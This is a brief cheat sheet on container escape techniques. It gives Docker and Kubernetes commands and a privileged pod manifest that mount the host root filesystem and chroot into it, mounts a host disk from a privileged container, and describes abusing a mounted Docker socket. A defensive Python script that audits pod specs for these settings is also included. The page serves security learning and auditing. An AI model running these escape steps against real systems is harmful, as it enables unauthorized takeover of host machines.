Container Security

A brief summary of some common container security issues.

Mount the rootfs of host in container

This results from misconfigured permissions for the docker user group or in Kubernetes.

# Docker: mount the host rootfs and chroot into it
docker run -v /:/host --rm -it alpine chroot /host sh

# Kubernetes: check whether you have the permissions
shell> kubectl auth can-i --list
Resources   Non-Resource URLs   Resource Names   Verbs
*.*         []                  []               [*]
            [*]                 []               [*]

# allow_all.yaml
apiVersion: v1
kind: Pod
metadata:
  name: all-allowed-exec-pod
  labels:
    app: prod
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: all-allowed-pod
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  nodeName: your-node-name
  volumes:
  - name: noderoot
    hostPath:
      path: /

kubectl apply -f allow_all.yaml
kubectl exec -it all-allowed-exec-pod -- chroot /host bash

You can use a reverse shell if you don’t have the pods/exec permission.

Privileged Container

# Returns CapEff=0000003fffffffff in a privileged container
cat /proc/self/status | grep CapEff
# Mount the host partition that holds the rootfs inside the container
mount /dev/sda1 /mnt
chroot /mnt /bin/sh

UNIX Socket of dockerd

The Docker UNIX socket is the connection between dockerd and its clients; dockerd runs as root by default.

When this socket is mounted into a container, a process in the container can communicate directly with the host's dockerd and thus take over the permissions of dockerd.

Run a docker client in the container and point it at the mount point of the host's docker UNIX socket.
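
The settings covered in the rootfs mount, privileged container and docker socket sections can be audited before a pod is admitted. The script below is an added example, not code from the original page: it checks a Pod object (as returned by kubectl get pod -o json) for host namespaces, privileged mode and risky hostPath mounts. The function name audit_pod and the RISKY_HOST_PATHS watch list are assumptions made for this example.

```python
import json

# Host paths whose exposure hands the node to the container (assumed watch list).
RISKY_HOST_PATHS = {"/", "/var/run/docker.sock", "/run/docker.sock"}

def audit_pod(pod):
    """Return findings for one Pod object (dict parsed from `kubectl get pod -o json`)."""
    spec = pod.get("spec", {})
    # Host namespace sharing removes network, PID and IPC isolation.
    findings = [f"spec.{flag}=true"
                for flag in ("hostNetwork", "hostPID", "hostIPC")
                if spec.get(flag) is True]
    # Map volume name -> normalised hostPath for volumes on the watch list.
    risky = {}
    for vol in spec.get("volumes", []):
        path = (vol.get("hostPath") or {}).get("path")
        if path is not None and "/" + path.strip("/") in RISKY_HOST_PATHS:
            risky[vol["name"]] = "/" + path.strip("/")
    for ctr in spec.get("containers", []) + spec.get("initContainers", []):
        name = ctr.get("name", "?")
        if (ctr.get("securityContext") or {}).get("privileged") is True:
            findings.append(f"container {name}: privileged=true")
        for mount in ctr.get("volumeMounts", []):
            if mount.get("name") in risky:
                mode = "ro" if mount.get("readOnly") else "rw"
                findings.append(f"container {name}: hostPath {risky[mount['name']]} "
                                f"mounted at {mount.get('mountPath')} ({mode})")
    return findings

# Constructed sample: the page's all-allowed-exec-pod manifest, expressed as JSON.
SAMPLE_POD = json.loads("""
{"apiVersion": "v1", "kind": "Pod",
 "metadata": {"name": "all-allowed-exec-pod"},
 "spec": {"hostNetwork": true, "hostPID": true, "hostIPC": true,
          "containers": [{"name": "all-allowed-pod", "image": "ubuntu",
                          "securityContext": {"privileged": true},
                          "volumeMounts": [{"mountPath": "/host", "name": "noderoot"}]}],
          "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}]}}
""")

if __name__ == "__main__":
    for finding in audit_pod(SAMPLE_POD):
        print(f"{SAMPLE_POD['metadata']['name']}: {finding}")
```

An empty result means none of these settings are present; it does not cover added capabilities or other hostPath locations.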

procfs exploit

common procfs tricks

Kernel exploit

DirtyCow or something else